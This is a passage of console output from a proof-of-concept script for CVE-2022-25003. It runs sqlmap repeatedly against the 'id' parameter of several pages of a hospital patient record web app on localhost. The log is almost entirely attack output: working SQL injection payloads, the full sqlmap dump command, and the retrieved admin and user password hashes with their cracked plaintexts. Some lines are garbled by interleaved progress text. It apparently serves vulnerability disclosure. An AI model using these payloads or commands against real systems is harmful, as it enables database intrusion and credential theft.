1 to 20 columns' [11:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [11:57:48] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [11:57:48] [INFO] target URL appears to have 8 columns in query [11:57:48] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 3060=3060 AND 'WBCY'='WBCY Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(3263=3263,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZQSU'='ZQSU Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 9794 FROM (SELECT(SLEEP(3)))mBlw) AND 'oVQB'='oVQB Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-5127' UNION ALL SELECT CONCAT(0x717a706a71,0x76436c4774624e78647045456f474773684944566f594345496f547a7146686e6477744e49516b51,0x71766a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [11:57:48] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.52, PHP, PHP 8.1.2 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [11:57:48] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [11:57:49] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [11:57:49] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [11:57:49] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [11:57:49] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [11:57:49] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [11:57:49] [INFO] starting dictionary-based cracking (md5_generic_passwd) [11:57:49] [INFO] starting 4 processes [11:57:54] [INFO] cracked password 'admin123' for user 'admin' [cblake11:58:04'8:04INFO] [] current status: affac... |INFO] cracked password 'stupid123' for user ' [11:58:07] [INFO] current status: brawl... \ [11:58:07] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed) Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [11:58:07] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [11:58:07] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 11:58:07 /2022-03-01/ Traceback (most recent call last): File "C:\Users\venvaropt\Desktop\CVE-2022-25003\PoC-SQL-automation-all-in-one.py", line 26, in <module> os.system('python C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\sqlmap.py -u http://localhost/hprms/admin/doctors/manage_doctor.php?id=1 -p id --time-sec 3 --dbms=mysql --batch --answers="crack=Y,dict=Y,continue=Y,quit=N" -D hprms_db -T users -C username,password --dump') KeyboardInterrupt PS C:\Users\venvaropt\Desktop\CVE-2022-25003> PS C:\Users\venvaropt\Desktop\CVE-2022-25003> python .\PoC-SQL-automation-all-in-one.py SQL - Injecting for parameter 'id' in view_doctors.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:01:23 /2022-03-01/ [12:01:23] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=62sg9tou51d...eqmgoe9q93'). Do you want to use those [Y/n] Y [12:01:23] [INFO] checking if the target is protected by some kind of WAF/IPS [12:01:23] [INFO] testing if the target URL content is stable [12:01:24] [INFO] target URL content is stable [12:01:24] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:01:24] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:01:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:01:24] [WARNING] reflective value(s) found and filtering out [12:01:24] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Sample Ward Room Good for 6 Patient") [12:01:24] [INFO] testing 'Generic inline queries' [12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:01:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:01:24] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:01:24] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [12:01:24] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [12:01:24] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:01:24] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:01:24] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:01:24] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [12:01:24] [INFO] testing 'MySQL inline queries' [12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [12:01:24] [WARNING] time-based comparison requires larger statistical model, please wait...... (done) [12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [12:01:24] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [12:01:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [12:01:25] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [12:01:31] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [12:01:31] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:01:31] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:01:31] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:01:31] [INFO] target URL appears to have 8 columns in query [12:01:31] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 8906=8906 AND 'Accs'='Accs Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 1670 FROM(SELECT COUNT(*),CONCAT(0x716a6b6a71,(SELECT (ELT(1670=1670,1))),0x71706b7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'UIHB'='UIHB Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 6841 FROM (SELECT(SLEEP(3)))ujWo) AND 'sPMh'='sPMh Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-1901' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a6b6a71,0x626561436b5273424d6544724748464f566f6851426f484a464c666a777a4768724b61577878704f,0x71706b7671),NULL,NULL,NULL,NULL-- - --- [12:01:31] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.52, PHP 8.1.2, PHP back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:01:31] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [12:01:31] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [12:01:31] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [12:01:31] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [12:01:32] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [12:01:32] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [12:01:32] [INFO] starting dictionary-based cracking (md5_generic_passwd) [12:01:32] [INFO] starting 4 processes [admin12312:01:38' for user '] [adminINFO' | [cblake12:01:48'] cracked password 'stupid123' for user ' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [12:02:09] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [12:02:09] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 12:02:09 /2022-03-01/ SQL - Injecting for parameter 'id' in manage_doctor.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:02:13 /2022-03-01/ [12:02:13] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=4tp11beihnp...3genbf0lef'). Do you want to use those [Y/n] Y [12:02:13] [INFO] checking if the target is protected by some kind of WAF/IPS [12:02:13] [INFO] testing if the target URL content is stable [12:02:14] [INFO] target URL content is stable [12:02:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:02:14] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:02:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:02:14] [WARNING] reflective value(s) found and filtering out [12:02:14] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Physical medicine and rehabilitation") [12:02:14] [INFO] testing 'Generic inline queries' [12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:02:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:02:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:02:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [12:02:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [12:02:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:02:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:02:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:02:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [12:02:14] [INFO] testing 'MySQL inline queries' [12:02:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [12:02:14] [WARNING] time-based comparison requires larger statistical model, please wait...... (done) [12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [12:02:15] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [12:02:15] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [12:02:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [12:02:21] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [12:02:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:02:21] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:02:21] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:02:21] [INFO] target URL appears to have 8 columns in query [12:02:21] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 3105=3105 AND 'nrvQ'='nrvQ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 5846 FROM(SELECT COUNT(*),CONCAT(0x7170767071,(SELECT (ELT(5846=5846,1))),0x717a706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NGNn'='NGNn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 4775 FROM (SELECT(SLEEP(3)))kUeP) AND 'LHyf'='LHyf Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-4962' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767071,0x47746f4c5467486944786f586c45764a6c59724e6c415375424f5246744c486c456b455055764c70,0x717a706b71),NULL,NULL,NULL,NULL,NULL-- - --- [12:02:21] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.1.2, PHP, Apache 2.4.52 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:02:21] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [12:02:21] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [12:02:21] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [12:02:21] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [12:02:21] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [12:02:21] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [12:02:21] [INFO] starting dictionary-based cracking (md5_generic_passwd) [12:02:21] [INFO] starting 4 processes [] [12:02:30INFO] [] cracked password 'INFOadmin123] current status: 19051... \' for user 'admin' [12:02:36] [] [INFOINFO] cracked password 'stupid123] current status: 70891... -' for user 'cblake' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [12:03:01] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [12:03:01] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 12:03:01 /2022-03-01/ SQL - Injecting for parameter 'id' in manage_patient.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:03:05 /2022-03-01/ [12:03:06] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=3timnfi1ddl...4mandk4la0'). Do you want to use those [Y/n] Y [12:03:06] [INFO] checking if the target is protected by some kind of WAF/IPS [12:03:06] [INFO] testing if the target URL content is stable [12:03:07] [INFO] target URL content is stable [12:03:07] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:03:07] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:03:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:03:07] [WARNING] reflective value(s) found and filtering out [12:03:07] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Over There Street, Here City, Anywhere, 2306") [12:03:07] [INFO] testing 'Generic inline queries' [12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:03:07] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:03:07] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:03:07] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [12:03:07] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [12:03:08] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:03:08] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:03:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:03:08] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [12:03:08] [INFO] testing 'MySQL inline queries' [12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [12:03:08] [WARNING] time-based comparison requires larger statistical model, please wait...... (done) [12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [12:03:08] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [12:03:08] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [12:03:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [12:03:14] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [12:03:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' [12:03:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found [12:03:14] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test [12:03:14] [INFO] target URL appears to have 7 columns in query [12:03:15] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 64 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 5342=5342 AND 'TSQh'='TSQh Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: id=1' AND (SELECT 4644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4644=4644,1))),0x71626a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'TAyy'='TAyy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 2728 FROM (SELECT(SLEEP(3)))orQs) AND 'lADO'='lADO Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: id=-6378' UNION ALL SELECT CONCAT(0x7162626b71,0x534e7a6c74596e766e426e5667486f7661586c6b445a556f485551486a547562436345664f585462,0x71626a6a71),NULL,NULL,NULL,NULL,NULL,NULL-- - --- [12:03:15] [INFO] the back-end DBMS is MySQL web application technology: PHP 8.1.2, Apache 2.4.52, PHP back-end DBMS: MySQL >= 5.0 (MariaDB fork) [12:03:15] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db' [12:03:15] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin' [12:03:15] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake' [12:03:15] [INFO] recognized possible password hashes in column 'password' do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N do you want to crack them via a dictionary-based attack? [Y/n/q] Y [12:03:26] [INFO] using hash method 'md5_generic_passwd' what dictionary do you want to use? [1] default dictionary file 'C:\Users\venvaropt\Desktop\CVE\sqlmap\data\txt\wordlist.tx_' (press Enter) [2] custom dictionary file [3] file with list of dictionary files > Y [12:03:26] [INFO] using default dictionary do you want to use common password suffixes? (slow!) [y/N] N [12:03:26] [INFO] starting dictionary-based cracking (md5_generic_passwd) [12:03:26] [INFO] starting 4 processes [' for user '12:03:32admin] ['O] current status: 1jesu... |] cracked password 'admin123 [12:03:4212:03:42] [] [INFOINFO] current status: P14O1... |] cracked password 'stupid123' for user 'cblake' Database: hprms_db Table: users [2 entries] +----------+----------------------------------------------+ | username | password | +----------+----------------------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 (admin123) | | cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) | +----------+----------------------------------------------+ [12:04:04] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost\dump\hprms_db\users.csv' [12:04:04] [INFO] fetched data logged to text files under 'C:\Users\venvaropt\AppData\Local\sqlmap\output\localhost' [*] ending @ 12:04:04 /2022-03-01/ SQL - Injecting for parameter 'id' in view_history.php app ,d d ,d d8 888-~88e 888 888 ,d888 ,d888 d88~\ e88~~8e e88~~\ 888 888 888-~\ ,d888 _d88__ Y88b / 888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/ 888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/ 888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y 888 888 "88_-888 888 888 \_88P "88___/ "88__/ "88_-888 888 888 "88_/ / _/ {1.6.1.2#dev} https://sqlmap.org https://www.nu11secur1ty.com/ [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 12:04:09 /2022-03-01/ [12:04:09] [INFO] testing connection to the target URL you have not declared cookie(s), while server wants to set its own ('PHPSESSID=om5n296h9bj...urhf8qd1t0'). Do you want to use those [Y/n] Y [12:04:09] [INFO] checking if the target is protected by some kind of WAF/IPS [12:04:09] [INFO] testing if the target URL content is stable [12:04:10] [INFO] target URL content is stable [12:04:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [12:04:10] [INFO] testing for SQL injection on GET parameter 'id' for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y [12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [12:04:10] [WARNING] reflective value(s) found and filtering out [12:04:10] [INFO] testing 'Boolean-based blind - Parameter replace (original value)' [12:04:10] [INFO] testing 'Generic inline queries' [12:04:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' [12:04:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' [12:04:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' [12:04:14] [INFO] GET parameter 'id' appears to be 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)' injectable [12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' [12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)' [12:04:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' [12:04:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)' [12:04:14] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' [12:04:14] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)' [12:04:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' [12:04:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)' [12:04:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:04:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' [12:04:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable [12:04:14] [INFO] testing 'MySQL inline queries' [12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)' [12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries' [12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [12:04:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)' [12:04:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)' [12:04:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [12:04:20] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable [12:04:20] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' 